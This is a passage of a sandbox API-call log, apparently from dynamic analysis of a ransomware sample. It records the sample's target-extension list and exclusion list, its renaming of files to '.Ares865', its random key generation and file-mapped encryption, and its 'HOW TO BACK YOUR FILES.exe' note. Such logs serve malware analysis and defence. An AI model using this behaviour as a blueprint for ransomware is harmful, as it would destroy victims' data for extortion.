[0044.797] lstrlenW (lpString="adb") returned 3 [0044.797] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0044.797] lstrlenW (lpString="ade") returned 3 [0044.797] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0044.797] lstrlenW (lpString="adf") returned 3 [0044.797] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0044.797] lstrlenW (lpString="adn") returned 3 [0044.797] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0044.797] lstrlenW (lpString="adp") returned 3 [0044.797] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0044.797] lstrlenW (lpString="alf") returned 3 [0044.797] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0044.797] lstrlenW (lpString="ask") returned 3 [0044.798] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0044.798] lstrlenW (lpString="btr") returned 3 [0044.798] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0044.798] lstrlenW (lpString="cat") returned 3 [0044.798] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0044.798] lstrlenW (lpString="cdb") returned 3 [0044.798] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0044.798] lstrlenW (lpString="ckp") returned 3 [0044.798] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0044.798] lstrlenW (lpString="cma") returned 3 [0044.798] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0044.798] lstrlenW (lpString="cpd") returned 3 [0044.798] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0044.798] lstrlenW (lpString="dacpac") returned 6 [0044.798] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0044.798] lstrlenW (lpString="dad") returned 3 [0044.798] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0044.798] lstrlenW (lpString="dadiagrams") returned 10 [0044.798] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0044.798] lstrlenW (lpString="daschema") returned 8 [0044.798] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0044.798] lstrlenW (lpString="db-journal") returned 10 [0044.798] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0044.798] lstrlenW (lpString="db-shm") returned 6 [0044.798] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0044.798] lstrlenW (lpString="db-wal") returned 6 [0044.798] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0044.798] lstrlenW (lpString="dbc") returned 3 [0044.798] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0044.798] lstrlenW (lpString="dbs") returned 3 [0044.798] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0044.798] lstrlenW (lpString="dbt") returned 3 [0044.798] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0044.799] lstrlenW (lpString="dbv") returned 3 [0044.799] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0044.799] lstrlenW (lpString="dbx") returned 3 [0044.799] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0044.799] lstrlenW (lpString="dcb") returned 3 [0044.799] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0044.799] lstrlenW (lpString="dct") returned 3 [0044.799] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0044.799] lstrlenW (lpString="dcx") returned 3 [0044.799] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0044.799] lstrlenW (lpString="ddl") returned 3 [0044.799] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0044.799] lstrlenW (lpString="dlis") returned 4 [0044.799] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0044.799] lstrlenW (lpString="dp1") returned 3 [0044.799] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0044.799] lstrlenW (lpString="dqy") returned 3 [0044.799] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0044.799] lstrlenW (lpString="dsk") returned 3 [0044.799] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0044.799] lstrlenW (lpString="dsn") returned 3 [0044.799] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0044.799] lstrlenW (lpString="dtsx") returned 4 [0044.799] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0044.799] lstrlenW (lpString="dxl") returned 3 [0044.799] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0044.799] lstrlenW (lpString="eco") returned 3 [0044.799] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0044.799] lstrlenW (lpString="ecx") returned 3 [0044.799] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0044.799] lstrlenW (lpString="edb") returned 3 [0044.799] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0044.799] lstrlenW (lpString="epim") returned 4 [0044.799] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0044.800] lstrlenW (lpString="fcd") returned 3 [0044.800] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0044.800] lstrlenW (lpString="fdb") returned 3 [0044.800] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0044.800] lstrlenW (lpString="fic") returned 3 [0044.800] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0044.800] lstrlenW (lpString="flexolibrary") returned 12 [0044.800] lstrlenW (lpString="fm5") returned 3 [0044.800] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0044.800] lstrlenW (lpString="fmp") returned 3 [0044.800] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0044.800] lstrlenW (lpString="fmp12") returned 5 [0044.800] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0044.800] lstrlenW (lpString="fmpsl") returned 5 [0044.800] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0044.800] lstrlenW (lpString="fol") returned 3 [0044.800] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0044.800] lstrlenW (lpString="fp3") returned 3 [0044.800] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0044.800] lstrlenW (lpString="fp4") returned 3 [0044.800] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0044.800] lstrlenW (lpString="fp5") returned 3 [0044.800] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0044.800] lstrlenW (lpString="fp7") returned 3 [0044.800] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0044.800] lstrlenW (lpString="fpt") returned 3 [0044.800] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0044.800] lstrlenW (lpString="frm") returned 3 [0044.800] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0044.800] lstrlenW (lpString="gdb") returned 3 [0044.800] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0044.800] lstrlenW (lpString="gdb") returned 3 [0044.800] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0044.800] lstrlenW (lpString="grdb") returned 4 [0044.800] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0044.801] lstrlenW (lpString="gwi") returned 3 [0044.801] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0044.801] lstrlenW (lpString="hdb") returned 3 [0044.801] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0044.801] lstrlenW (lpString="his") returned 3 [0044.801] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0044.801] lstrlenW (lpString="ib") returned 2 [0044.801] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0044.801] lstrlenW (lpString="idb") returned 3 [0044.801] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0044.801] lstrlenW (lpString="ihx") returned 3 [0044.801] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0044.801] lstrlenW (lpString="itdb") returned 4 [0044.801] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0044.801] lstrlenW (lpString="itw") returned 3 [0044.801] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0044.801] lstrlenW (lpString="jet") returned 3 [0044.801] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0044.801] lstrlenW (lpString="jtx") returned 3 [0044.801] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0044.801] lstrlenW (lpString="kdb") returned 3 [0044.801] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0044.801] lstrlenW (lpString="kexi") returned 4 [0044.801] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0044.801] lstrlenW (lpString="kexic") returned 5 [0044.801] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0044.801] lstrlenW (lpString="kexis") returned 5 [0044.801] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0044.801] lstrlenW (lpString="lgc") returned 3 [0044.801] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0044.801] lstrlenW (lpString="lwx") returned 3 [0044.801] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0044.801] lstrlenW (lpString="maf") returned 3 [0044.801] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0044.801] lstrlenW (lpString="maq") returned 3 [0044.802] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0044.802] lstrlenW (lpString="mar") returned 3 [0044.802] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0044.802] lstrlenW (lpString="marshal") returned 7 [0044.802] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0044.802] lstrlenW (lpString="mas") returned 3 [0044.802] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0044.802] lstrlenW (lpString="mav") returned 3 [0044.802] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0044.802] lstrlenW (lpString="maw") returned 3 [0044.802] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0044.802] lstrlenW (lpString="mdbhtml") returned 7 [0044.802] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0044.802] lstrlenW (lpString="mdn") returned 3 [0044.802] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0044.802] lstrlenW (lpString="mdt") returned 3 [0044.802] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0044.802] lstrlenW (lpString="mfd") returned 3 [0044.802] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0044.802] lstrlenW (lpString="mpd") returned 3 [0044.802] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0044.802] lstrlenW (lpString="mrg") returned 3 [0044.802] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0044.802] lstrlenW (lpString="mud") returned 3 [0044.802] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0044.802] lstrlenW (lpString="mwb") returned 3 [0044.802] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0044.802] lstrlenW (lpString="myd") returned 3 [0044.802] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0044.802] lstrlenW (lpString="ndf") returned 3 [0044.802] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0044.802] lstrlenW (lpString="nnt") returned 3 [0044.802] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0044.803] lstrlenW (lpString="nrmlib") returned 6 [0044.803] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0044.803] lstrlenW (lpString="ns2") returned 3 [0044.803] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0044.803] lstrlenW (lpString="ns3") returned 3 [0044.803] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0044.803] lstrlenW (lpString="ns4") returned 3 [0044.803] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0044.803] lstrlenW (lpString="nsf") returned 3 [0044.803] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0044.803] lstrlenW (lpString="nv") returned 2 [0044.803] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0044.803] lstrlenW (lpString="nv2") returned 3 [0044.803] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0044.803] lstrlenW (lpString="nwdb") returned 4 [0044.803] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0044.803] lstrlenW (lpString="nyf") returned 3 [0044.803] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0044.803] lstrlenW (lpString="odb") returned 3 [0044.803] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0044.803] lstrlenW (lpString="odb") returned 3 [0044.803] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0044.803] lstrlenW (lpString="oqy") returned 3 [0044.803] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0044.803] lstrlenW (lpString="ora") returned 3 [0044.803] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0044.803] lstrlenW (lpString="orx") returned 3 [0044.803] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0044.803] lstrlenW (lpString="owc") returned 3 [0044.803] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0044.803] lstrlenW (lpString="p96") returned 3 [0044.803] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0044.803] lstrlenW (lpString="p97") returned 3 [0044.803] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0044.804] lstrlenW (lpString="pan") returned 3 [0044.804] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0044.804] lstrlenW (lpString="pdb") returned 3 [0044.804] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0044.804] lstrlenW (lpString="pdm") returned 3 [0044.804] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0044.804] lstrlenW (lpString="pnz") returned 3 [0044.804] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0044.804] lstrlenW (lpString="qry") returned 3 [0044.804] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0044.804] lstrlenW (lpString="qvd") returned 3 [0044.804] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0044.804] lstrlenW (lpString="rbf") returned 3 [0044.804] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0044.804] lstrlenW (lpString="rctd") returned 4 [0044.804] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0044.804] lstrlenW (lpString="rod") returned 3 [0044.804] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0044.804] lstrlenW (lpString="rodx") returned 4 [0044.804] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0044.804] lstrlenW (lpString="rpd") returned 3 [0044.804] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0044.804] lstrlenW (lpString="rsd") returned 3 [0044.804] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0044.804] lstrlenW (lpString="sas7bdat") returned 8 [0044.804] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0044.804] lstrlenW (lpString="sbf") returned 3 [0044.804] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0044.804] lstrlenW (lpString="scx") returned 3 [0044.804] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0044.804] lstrlenW (lpString="sdb") returned 3 [0044.804] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0044.804] lstrlenW (lpString="sdc") returned 3 [0044.804] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0044.805] lstrlenW (lpString="sdf") returned 3 [0044.805] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0044.805] lstrlenW (lpString="sis") returned 3 [0044.805] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0044.805] lstrlenW (lpString="spq") returned 3 [0044.805] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0044.805] lstrlenW (lpString="te") returned 2 [0044.805] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0044.805] lstrlenW (lpString="teacher") returned 7 [0044.805] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0044.805] lstrlenW (lpString="tmd") returned 3 [0044.805] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0044.805] lstrlenW (lpString="tps") returned 3 [0044.805] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0044.805] lstrlenW (lpString="trc") returned 3 [0044.805] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0044.805] lstrlenW (lpString="trc") returned 3 [0044.805] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0044.805] lstrlenW (lpString="trm") returned 3 [0044.805] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0044.805] lstrlenW (lpString="udb") returned 3 [0044.805] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0044.805] lstrlenW (lpString="udl") returned 3 [0044.805] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0044.805] lstrlenW (lpString="usr") returned 3 [0044.805] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0044.805] lstrlenW (lpString="v12") returned 3 [0044.805] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0044.805] lstrlenW (lpString="vis") returned 3 [0044.805] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0044.805] lstrlenW (lpString="vpd") returned 3 [0044.805] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0044.805] lstrlenW (lpString="vvv") returned 3 [0044.805] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0044.806] lstrlenW (lpString="wdb") returned 3 [0044.806] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0044.806] lstrlenW (lpString="wmdb") returned 4 [0044.806] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0044.806] lstrlenW (lpString="wrk") returned 3 [0044.806] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0044.806] lstrlenW (lpString="xdb") returned 3 [0044.806] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0044.806] lstrlenW (lpString="xld") returned 3 [0044.806] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0044.806] lstrlenW (lpString="xmlff") returned 5 [0044.806] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0044.806] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini.Ares865") returned 60 [0044.806] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0044.829] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0044.829] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1120) returned 1 [0044.829] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0044.829] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbbd0 [0044.830] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0044.830] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0044.830] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0044.830] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0044.831] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x168 [0044.840] MapViewOfFile (hFileMappingObject=0x168, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x190000 [0044.847] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0044.848] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0044.848] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0044.848] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0044.848] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0044.848] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2cb310 [0044.848] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0044.848] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0044.849] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0044.849] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cb310 [0044.849] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0044.849] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0044.849] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0044.849] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0044.849] CloseHandle (hObject=0x168) returned 1 [0044.849] CloseHandle (hObject=0x164) returned 1 [0044.850] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbbd0 | out: hHeap=0x2b0000) returned 1 [0044.850] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0044.851] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0044.851] FindNextFileW (in: hFindFile=0x2cce68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4970c680, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4970c680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0044.851] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0044.851] FindNextFileW (in: hFindFile=0x2cce68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x91554, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hydrangeas.jpg", cAlternateFileName="HYDRAN~1.JPG")) returned 1 [0044.851] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0044.851] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="aoldtz.exe") returned 1 [0044.851] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2=".") returned 1 [0044.851] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="..") returned 1 [0044.851] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="windows") returned -1 [0044.851] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="bootmgr") returned 1 [0044.851] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="temp") returned -1 [0044.851] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="pagefile.sys") returned -1 [0044.851] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="boot") returned 1 [0044.851] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="ids.txt") returned -1 [0044.851] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="ntuser.dat") returned -1 [0044.851] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="perflogs") returned -1 [0044.851] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="MSBuild") returned -1 [0044.851] lstrlenW (lpString="Hydrangeas.jpg") returned 14 [0044.851] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini") returned 52 [0044.851] lstrcpyW (in: lpString1=0x2cce452, lpString2="Hydrangeas.jpg" | out: lpString1="Hydrangeas.jpg") returned="Hydrangeas.jpg" [0044.851] lstrlenW (lpString="Hydrangeas.jpg") returned 14 [0044.851] lstrlenW (lpString="Ares865") returned 7 [0044.851] lstrcmpiW (lpString1="eas.jpg", lpString2="Ares865") returned 1 [0044.851] lstrlenW (lpString=".dll") returned 4 [0044.851] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2=".dll") returned 1 [0044.851] lstrlenW (lpString=".lnk") returned 4 [0044.851] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2=".lnk") returned 1 [0044.852] lstrlenW (lpString=".ini") returned 4 [0044.852] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2=".ini") returned 1 [0044.852] lstrlenW (lpString=".sys") returned 4 [0044.852] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2=".sys") returned 1 [0044.852] lstrlenW (lpString="Hydrangeas.jpg") returned 14 [0044.852] lstrlenW (lpString="bak") returned 3 [0044.852] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0044.852] lstrlenW (lpString="ba_") returned 3 [0044.852] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0044.852] lstrlenW (lpString="dbb") returned 3 [0044.852] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0044.852] lstrlenW (lpString="vmdk") returned 4 [0044.852] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0044.852] lstrlenW (lpString="rar") returned 3 [0044.852] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0044.852] lstrlenW (lpString="zip") returned 3 [0044.852] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0044.852] lstrlenW (lpString="tgz") returned 3 [0044.852] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0044.852] lstrlenW (lpString="vbox") returned 4 [0044.852] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned -1 [0044.852] lstrlenW (lpString="vdi") returned 3 [0044.852] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0044.852] lstrlenW (lpString="vhd") returned 3 [0044.852] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0044.852] lstrlenW (lpString="vhdx") returned 4 [0044.852] lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0044.852] lstrlenW (lpString="avhd") returned 4 [0044.852] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0044.852] lstrlenW (lpString="db") returned 2 [0044.852] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0044.852] lstrlenW (lpString="db2") returned 3 [0044.852] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0044.852] lstrlenW (lpString="db3") returned 3 [0044.853] lstrcmpiW (lpString1="jpg", lpString2="db3") returned 1 [0044.853] lstrlenW (lpString="dbf") returned 3 [0044.853] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0044.853] lstrlenW (lpString="mdf") returned 3 [0044.853] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0044.853] lstrlenW (lpString="mdb") returned 3 [0044.853] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0044.853] lstrlenW (lpString="sql") returned 3 [0044.853] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0044.853] lstrlenW (lpString="sqlite") returned 6 [0044.853] lstrcmpiW (lpString1="as.jpg", lpString2="sqlite") returned -1 [0044.853] lstrlenW (lpString="sqlite3") returned 7 [0044.853] lstrcmpiW (lpString1="eas.jpg", lpString2="sqlite3") returned -1 [0044.853] lstrlenW (lpString="sqlitedb") returned 8 [0044.853] lstrcmpiW (lpString1="geas.jpg", lpString2="sqlitedb") returned -1 [0044.853] 